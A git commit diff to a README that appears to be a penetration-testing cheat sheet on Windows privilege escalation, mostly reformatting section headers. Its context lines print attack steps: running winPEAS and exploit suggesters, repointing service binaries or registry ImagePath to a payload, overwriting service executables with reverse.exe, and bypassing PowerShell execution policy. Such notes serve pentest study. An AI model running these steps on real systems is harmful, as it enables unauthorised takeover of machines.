Update README.md

Joe Totes
2022-09-03 09:37:08 -04:00
committed by GitHub
parent 3ff5e826c9
commit b1cf4a69c2


@@ -665,7 +665,7 @@ python3 exploit.py
[Windows Expoit Suggestor](https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py) [Windows Expoit Suggestor](https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py)
```bash ```ps1
# Find information about system # Find information about system
systeminfo systeminfo
@@ -683,9 +683,9 @@ python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | less
.\winPEASany.exe quiet servicesinfo .\winPEASany.exe quiet servicesinfo
#####################################
# 1. Insecure Service Properties # 1. Insecure Service Properties ####
#####################################
# Verify permissions of a service using accesschk # Verify permissions of a service using accesschk
.\accesschk.exe /accepteula -uwcqv user {SERVICE} .\accesschk.exe /accepteula -uwcqv user {SERVICE}
@@ -702,8 +702,9 @@ config {SERVICE} binpath= "\"C:\{PAYLOAD PATH}\""
# Start a service: # Start a service:
net start {SERVICE} net start {SERVICE}
###############################
# 2. Unquoted Service Path # 2. Unquoted Service Path ####
###############################
# Verify permissions of to start service using accesschk # Verify permissions of to start service using accesschk
.\accesschk.exe /accepteula -uwcqv user {SERVICE} .\accesschk.exe /accepteula -uwcqv user {SERVICE}
@@ -718,8 +719,9 @@ copy reverse.exe {BINARY PATH: ex. "C:\Program Files\Unquoted Path Service\Commo
net start {SERVICE} net start {SERVICE}
###################################
# 3. Weak Registry Permissions # 3. Weak Registry Permissions ####
###################################
# Check regsvc for weak entries using powershell # Check regsvc for weak entries using powershell
powershell -exec bypass powershell -exec bypass
@@ -741,11 +743,9 @@ reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND
# Start the service: # Start the service:
net start regsvc net start regsvc
###################################################################
# 4. Insecure Service Executables (File Permissions: Everyone) ####
###################################################################
# 4. Insecure Service Executables (File Permissions: Everyone)
# Verify permissions of a service using accesschk # Verify permissions of a service using accesschk
.\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe" .\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
@@ -759,9 +759,9 @@ copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepe
# Start the service # Start the service
net start filepermsvc net start filepermsvc
#######################
# 5. DLL Hijacking # 5. DLL Hijacking ####
#######################
# Verify permissions of to start service using accesschk # Verify permissions of to start service using accesschk
.\accesschk.exe /accepteula -uvqc dllsvc .\accesschk.exe /accepteula -uvqc dllsvc